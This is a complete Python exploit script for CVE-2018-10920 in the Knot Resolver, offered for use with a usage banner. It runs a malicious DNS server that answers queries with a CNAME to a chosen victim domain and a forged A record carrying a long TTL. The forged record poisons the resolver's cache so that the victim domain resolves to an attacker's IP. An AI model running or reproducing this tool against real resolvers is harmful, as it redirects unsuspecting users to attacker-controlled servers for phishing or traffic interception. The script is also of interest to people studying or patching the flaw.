#!/usr/local/bin/python3.6 #CVE-2018-10920 exploit. #DO NOT ABUSE !!! import socket, sys #pip install dnslib from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, NS, A class KnotSpoofer(): def __init__(self, ipaddr, vic_name, fakeip): self.host = ipaddr self.port = 53 self.vic_name = vic_name self.fakeip = fakeip def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((self.host, self.port)) print("[+] KnotSpoofer Started.") while True: msg, (cliHost, cliPort) = sock.recvfrom(8096) print(" [+] Received DNS Packet. Client:" + str(cliHost) + ":" + str(cliPort)) responseData = self.craftPayload(msg) if responseData is not None: sock.sendto(responseData, (cliHost, cliPort)) def craftPayload(self, msg): query = DNSRecord.parse(msg) response = query.reply() qname = query.q.qname vic_name = self.vic_name fakeip = self.fakeip if query.q.qtype == QTYPE.NS: print("[+] required NS record.") assert_ns = RR(qname, QTYPE.NS, ttl=60, rdata=NS("ns.%s" % qname)) response.add_answer(assert_ns) elif query.q.qtype == QTYPE.A: print("[+] required any A record.") cnamerr = RR(qname, QTYPE.CNAME, ttl=60, rdata=CNAME(vic_name)) fakea = RR(vic_name, QTYPE.A, ttl=86400, rdata=A(fakeip)) response.add_answer(cnamerr) response.add_answer(fakea) if response.__class__.__name__ == "DNSRecord": print("[!] Debug: print reply data") print("===============================") print(response) print("===============================") return response.pack() else: return None if __name__ == '__main__': print("-----------------------------------------------") print("Knot Reslver Kashpureff Exploit(CVE-2018-10920)") print("-----------------------------------------------") if len(sys.argv) < 3: print("[+] Usage: %s [victim.com.] [Fake A Record IPAddr]" % sys.argv[0]) print("[!] You can inject only the sibling domain which the queried domain.") sys.exit() vic_name = sys.argv[1] fakeip = sys.argv[2] srv = KnotSpoofer("0.0.0.0", vic_name, fakeip) srv.run()